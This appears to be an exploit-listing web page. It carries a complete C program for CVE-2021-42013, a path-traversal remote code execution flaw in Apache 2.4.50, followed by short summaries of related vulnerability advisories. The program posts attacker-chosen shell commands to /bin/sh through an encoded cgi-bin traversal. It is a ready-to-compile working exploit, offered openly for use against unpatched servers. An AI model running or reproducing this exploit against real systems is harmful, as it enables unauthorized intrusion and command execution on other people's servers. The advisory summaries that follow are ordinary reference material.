Headline
Apache 2.4.50 Remote Code Execution
Apache version 2.4.50 remote code execution exploit that leverages a traversal as identified in CVE-2021-42013. Written in C.
#include <stdio.h>#include <stdlib.h>#include <stdbool.h>#include <string.h>#include <curl/curl.h>/* Apache 2.4.50 exploit (CVE-2021-42013) * Author: Vilius Povilaika * Website: www.povilaika.com */// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013int usage(char* prog){ printf("Usage: %s <host> <exec>\n", prog); printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog); return 0;}bool error(const char* reason){ printf("[ERR] Critical error - %s\n", reason); return false;}struct callback_result { char* data; size_t size;};static size_t callback(void* pointer, size_t size, size_t nmemb, void* data){ struct callback_result *memory = (struct callback_result *)data; char* ptr = realloc(memory->data, memory->size+nmemb+1); memory->data = ptr; memcpy(&(memory->data[memory->size]), pointer, nmemb); memory->size += nmemb; memory->data[memory->size] = 0; return nmemb;}bool exploit(void* result, char* host, char* exec){ CURL *curl = curl_easy_init(); char url[256]; sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host); curl_easy_setopt(curl, CURLOPT_URL, url); char payload[256]; sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback); curl_easy_setopt(curl, CURLOPT_WRITEDATA, result); int res = curl_easy_perform(curl); if (res != CURLE_OK) return error(curl_easy_strerror(res)); curl_easy_cleanup(curl); return true;}int main(int argc, char* argv[]){ if (argc != 3) return usage(argv[0]); struct callback_result result = {0}; bool res = exploit(&result, argv[1], argv[2]); if (res) printf("[+] Exploit finished successfully, check output\n"); else printf("[-] Exploit failed, check output\n"); printf(" \n%s\n", result.data); return 0;}Related news
The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,
Gentoo Linux Security Advisory 202208-20 - Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution. Versions less than 2.4.54 are affected.
Pexip Infinity 27 before 28.0 allows remote attackers to trigger excessive resource consumption and termination because of registrar resource mishandling.
Pexip Infinity before 28.1 allows remote attackers to trigger a software abort via G.719.
Pexip Infinity 27.x before 27.2 has Improper Access Control. An attacker can sometimes join a conference (call join) if it has a lock but not a PIN.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via H.323.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via Epic Telehealth.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via HTTP.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via the Session Initiation Protocol.
Pexip Infinity before 27.3 allows remote attackers to trigger excessive resource consumption via H.264.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via HTTP.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via the Session Initiation Protocol.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort, and possibly enumerate usernames, via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to force a software abort via HTTP.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via single-sign-on if a random Universally Unique Identifier is guessed.
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...
If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.